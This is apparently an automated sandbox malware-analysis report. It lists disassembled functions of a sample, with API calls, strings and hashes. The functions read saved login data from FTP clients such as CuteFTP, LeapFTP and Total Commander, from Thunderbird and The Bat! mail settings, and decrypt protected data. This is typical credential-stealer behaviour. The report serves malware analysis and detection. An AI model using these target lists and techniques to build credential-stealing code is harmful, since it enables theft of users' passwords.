                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$PortNumber$TerminalType$UserName
                  • API String ID: 1332880857-1017491782
                  • Opcode ID: e45bf4f1cfbbdc763139fd9d92b4d7831cbcbeaef730a9ba2b50ab4b099c948c
                  • Instruction ID: a4f802e2f5d43537197500abbdec13c8f860e1ef9e7746915754de3be4be51d1
                  • Opcode Fuzzy Hash: e45bf4f1cfbbdc763139fd9d92b4d7831cbcbeaef730a9ba2b50ab4b099c948c
                  • Instruction Fuzzy Hash: 14419371950118BADF226F51CC02FDD7ABAFF04304F1085BAB548740B1DF7A9AA1AF88
                  Function 004073A7 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073EE
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                  • API String ID: 1332880857-980612798
                  • Opcode ID: b5f62c41b226238b1aeeda9580961b4b2f9fc0c193a7546e98621532dd0ea930
                  • Instruction ID: 65d12525e2ccfe44dbcc2586c6b7d8d5449bcbc8eb361ef797c021868b1a8cd1
                  • Opcode Fuzzy Hash: b5f62c41b226238b1aeeda9580961b4b2f9fc0c193a7546e98621532dd0ea930
                  • Instruction Fuzzy Hash: CD41A33194011CBADF216F51CC42BDD7ABABF04344F14C1BAB958740B1DB7A5B91AF89
                  Function 004061E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040622E
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostDirName$HostName$Password$Port$Username
                  • API String ID: 1332880857-791697221
                  • Opcode ID: 423c8b28037296a5b9412eeb728e343160a994cba3e3e418bae913f9226a7395
                  • Instruction ID: 91a93f6c2eb37e4bef34affd95706de091d8f5c737f074acf3a03e94730403bc
                  • Opcode Fuzzy Hash: 423c8b28037296a5b9412eeb728e343160a994cba3e3e418bae913f9226a7395
                  • Instruction Fuzzy Hash: 4541C33194011CBADF227B61CC42BDC7ABABF44304F10C5BAB555740B1DB7A5BA1AF88
                  Function 00403BFF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112networkstringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
                  • wsprintfA.USER32 ref: 00403CFB
                  • lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
                  • closesocket.WS2_32(?), ref: 00403D48
                  Strings
                  • <, xrefs: 00403CB6
                  • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                  • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                  • API String ID: 4072649068-555445111
                  • Opcode ID: b2801055607956b01df8aaa845c9309bb4d0e1debe5b5c70d9e81d5f854c740b
                  • Instruction ID: 455a9add95b7005f1802d7da20ae01963ae842596f04e60a62cac8da7b113ca0
                  • Opcode Fuzzy Hash: b2801055607956b01df8aaa845c9309bb4d0e1debe5b5c70d9e81d5f854c740b
                  • Instruction Fuzzy Hash: F941F672D04209EAEF11AFA1CC41BEDBEBAFF04305F10403AF510B52A1D7B95A569B19
                  Function 0040D5C0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D60A
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: Host$Pass$Port$Remote Dir$User
                  • API String ID: 1332880857-1775099961
                  • Opcode ID: ca15aa498c9c128eba1c3849b652d499783f367f18f57c57688e64b0adada22b
                  • Instruction ID: fc949db77430eb660f6b268372fcc02bfd31585a785055f5a2b980fab56bfec1
                  • Opcode Fuzzy Hash: ca15aa498c9c128eba1c3849b652d499783f367f18f57c57688e64b0adada22b
                  • Instruction Fuzzy Hash: 3D41F435940118BADF227BA1CD42FDC7ABABF44304F10C1B6B548740B1DB7A5B91AF98
                  Function 0040C823 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,BlazeFtp), ref: 0040C84A
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                  • API String ID: 1884169789-2976447346
                  • Opcode ID: 8b9d6a3c774de1937f68bb1c0a7e820318191eb62227698ccdec7ecb284efa74
                  • Instruction ID: 5797c6d60b22c2f464e58eb1b9434a64d2379520c8b3ba6acddc696e890e51ac
                  • Opcode Fuzzy Hash: 8b9d6a3c774de1937f68bb1c0a7e820318191eb62227698ccdec7ecb284efa74
                  • Instruction Fuzzy Hash: C8312A71940109BADF127BA1CC42FEE7E72AF80744F10423AB505751F5D7798A919B4C
                  Function 004053C3 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(00D36918,CUTEFTP), ref: 004053EA
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
                  • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
                  • CUTEFTP, xrefs: 004053E4
                  • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
                  • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
                  • \sm.dat, xrefs: 004053FE
                  • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
                  • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                  • API String ID: 1884169789-2738976122
                  • Opcode ID: d28e310910dab2ec941093aed6453b6cf34f60c08814834dcaab4dce1dcb979b
                  • Instruction ID: af8c2a2578185299ae0a1b73df8370b0160bc68398161020f7fa43906d426443
                  • Opcode Fuzzy Hash: d28e310910dab2ec941093aed6453b6cf34f60c08814834dcaab4dce1dcb979b
                  • Instruction Fuzzy Hash: DC11EF71550A04BADB123F21CC02FDF3E51EB91785F10413AB908790E6DBB98A919E9C
                  Function 00403A78 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
                  • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
                  • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
                  • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
                  • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$AllocLocal
                  • String ID: Content-Length:$Location:
                  • API String ID: 2140729754-2400408565
                  • Opcode ID: 8bd9e645aeb4eeef39c57d7d933fb2533e55aaa73b84addd3dd7bab501d08d01
                  • Instruction ID: c9a45cc5e326586f238494a52d821c4ce228c4fac09fd551ff7f483649c64218
                  • Opcode Fuzzy Hash: 8bd9e645aeb4eeef39c57d7d933fb2533e55aaa73b84addd3dd7bab501d08d01
                  • Instruction Fuzzy Hash: 6441E631A04249BBDB10AFA5CC41F9DFF79EF80309F208177B510B62E2CB799A519B18
                  Function 00406D4F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D99
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: Hostname$Password$Port$Username
                  • API String ID: 3369285772-1811172798
                  • Opcode ID: 3a1a2dc9e5446524c897a00edefc47729aba8e1b75128e16b45e2c4e60b0b22d
                  • Instruction ID: 01c73e2fb8f2e8008526dd15f23c38cafda3df1f016bfbfc9eb4feb051cd8b26
                  • Opcode Fuzzy Hash: 3a1a2dc9e5446524c897a00edefc47729aba8e1b75128e16b45e2c4e60b0b22d
                  • Instruction Fuzzy Hash: D741053590011CEADF216B61CC42BEDBAB9BF44304F10C5BAB145740B1DB7A5BA1AF99
                  Function 00406B1B Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B65
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumFreeLocalOpen
                  • String ID: FtpPort$Password$Server$Username
                  • API String ID: 3369285772-1828875246
                  • Opcode ID: daf71e863fe6109af2fc1006fb528a03c45801e8c0aa728fb4f7e8ea06808ca6
                  • Instruction ID: d34a0bd3cc77e900c5c4b450b5daa5372aca7566d24bafcbecf5bccf180f15d7
                  • Opcode Fuzzy Hash: daf71e863fe6109af2fc1006fb528a03c45801e8c0aa728fb4f7e8ea06808ca6
                  • Instruction Fuzzy Hash: 3641F43194011CEADF216B61CC42BDD7AB9FF44304F10C5BAB589740B1DB795BA1AF98
                  Function 0040E237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E377
                    • Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                    • Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C
                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                  • String ID: Folder$Port$Site$UserID$xflags
                  • API String ID: 2167297517-269738940
                  • Opcode ID: 6427dab74797cbb04a54bded977b0add44c52ca5aab09b9feae9cc3475bc1adf
                  • Instruction ID: 4020a8b780a2b15ed0bfe4ab97c14df79abec745e08682ab0873d8ad7dcb102d
                  • Opcode Fuzzy Hash: 6427dab74797cbb04a54bded977b0add44c52ca5aab09b9feae9cc3475bc1adf
                  • Instruction Fuzzy Hash: 4831987591010ABADF126F91CC02FEEBF76AF04344F14853AB920751F1D77A9A61EB48
                  Function 004078C8 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040790F
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: DataDir$InstallPath$sites.dat$sites.ini
                  • API String ID: 1332880857-3870687875
                  • Opcode ID: 76e958c24b1deef2ba1e015dee75c58f2a5acbbe01ce518446e0375433f53f16
                  • Instruction ID: 80332ff880749a05d70071cd874255de2caa786c897a919a20446d659acdd0fd
                  • Opcode Fuzzy Hash: 76e958c24b1deef2ba1e015dee75c58f2a5acbbe01ce518446e0375433f53f16
                  • Instruction Fuzzy Hash: 5031E23194411CFADF216B51CC42FDD7ABABF40304F10C0BAB658740A1CAB9AB91AF89
                  Function 0040F81F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D
                    • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                    • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                    • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                    • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F892
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F8AD
                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F8F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectory$CloseEnumOpen
                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                  • API String ID: 3062143572-138716004
                  • Opcode ID: 9c669d628a5ba79229b690a8f6838d7bdce716b56b14d70657ee061b1896abe3
                  • Instruction ID: 28646a911757116e94f15e6f01fbd3e04202e197479de2f3dc17eb1ce1263c31
                  • Opcode Fuzzy Hash: 9c669d628a5ba79229b690a8f6838d7bdce716b56b14d70657ee061b1896abe3
                  • Instruction Fuzzy Hash: AA110A30784208BADB12BF51CC43FCD3EA9AB14744F208066BA44751E3DBF99AD09A4C
                  Function 00407A7F Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(00D36918,unleap.exe), ref: 00407AB1
                  • lstrlen.KERNEL32(unleap.exe,00000001,00D36918,unleap.exe), ref: 00407ACA
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • StrStrIA.SHLWAPI(00D33330,leapftp,00D36918,unleap.exe), ref: 00407B0E
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                  • API String ID: 1884169789-1497043051
                  • Opcode ID: f3674a5b3aee851ed9d723bf4657d85b9039ac95f934e8d5144fc55d0d771801
                  • Instruction ID: f6d8597f3c39ef5cb17946c79053863a9f5b81d5ce485e0e6efee4e8d9f6bd78
                  • Opcode Fuzzy Hash: f3674a5b3aee851ed9d723bf4657d85b9039ac95f934e8d5144fc55d0d771801
                  • Instruction Fuzzy Hash: 0D217571A48104BDEF117B22CC02FEE7E1ADB81748F244437B904B51E2C7BDAB91969D
                  Function 0040EF6C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  • wsprintfA.USER32 ref: 0040F041
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeLocalwsprintf
                  • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                  • API String ID: 988369812-1921698578
                  • Opcode ID: 9f976759eed1c700d30ac5146df1de740f7a482d4ac6e4601605a6a8fe0f73bb
                  • Instruction ID: fed5c90026c787a5fbef1c7d1fe235a3c157b904c400493770b8f3980bdf1dee
                  • Opcode Fuzzy Hash: 9f976759eed1c700d30ac5146df1de740f7a482d4ac6e4601605a6a8fe0f73bb
                  • Instruction Fuzzy Hash: E9311C35E40109FADF11AFA1DC42EED7A75AF00304F204577F410B51E1DB7A9B61AB48
                  Function 00404C51 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocDirectoryLocalWindows
                  • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                  • API String ID: 3186838798-3636168975
                  • Opcode ID: a07019577935bcb09a7f4736666a4b31bc8b107b9680495d70db46a6afa6c231
                  • Instruction ID: f6d2821ad958c7388fb02a6e686d28164b56292b3d6c5961f1af15425abffc82
                  • Opcode Fuzzy Hash: a07019577935bcb09a7f4736666a4b31bc8b107b9680495d70db46a6afa6c231
                  • Instruction Fuzzy Hash: 2741E474A80618B9EF127B62DC43FDD7E26DF80744F10817B7A10741F2DA7D9A509A5C
                  Function 0040491B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404965
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: HostName$Password$User
                  • API String ID: 1332880857-1253078594
                  • Opcode ID: 545eb7c1f343abba2d7ca97bf98ac2af81e8a0b7c702abbd0099a7942ceae710
                  • Instruction ID: 98587c7246023eda590ab4b04a193317df2f20019392e44baef5e6bd7c25d842
                  • Opcode Fuzzy Hash: 545eb7c1f343abba2d7ca97bf98ac2af81e8a0b7c702abbd0099a7942ceae710
                  • Instruction Fuzzy Hash: 6031F57594011CBADF216BA1CC42BDD7ABABF80304F10C4BAB544750B1DB795B92AF88
                  Function 00408E0D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E54
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                  • API String ID: 1332880857-3184955129
                  • Opcode ID: 569842c86fd88c51f281fb5a95c5170de9420fa2f4320b38c8a31c02c0a70358
                  • Instruction ID: 289def8647f9f052a30cad21942cca221b2f971ebee562f4c1d1b9d935c22a17
                  • Opcode Fuzzy Hash: 569842c86fd88c51f281fb5a95c5170de9420fa2f4320b38c8a31c02c0a70358
                  • Instruction Fuzzy Hash: E731063190010DBADF21AB61CD42FDD7ABABF40304F10C5BAB654B41E1DE799B91AF98
                  Function 00409DCB Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E28
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                    • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                    • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                    • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                  • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                  • API String ID: 3007406096-624000163
                  • Opcode ID: aac476555775a887f44ea9abe9e2c719c60256b06f0d0591148d91a28e288c1a
                  • Instruction ID: 111a98885658f5a555e2dd97bd32bee393decd78d01063375c2202b71a427992
                  • Opcode Fuzzy Hash: aac476555775a887f44ea9abe9e2c719c60256b06f0d0591148d91a28e288c1a
                  • Instruction Fuzzy Hash: 53011E70680209BADF21BB61CC47FDE3E599B44748F11807E7A04751E3DEB9CAD0969C
                  Function 00409C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85registryCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(?,?), ref: 00409C48
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
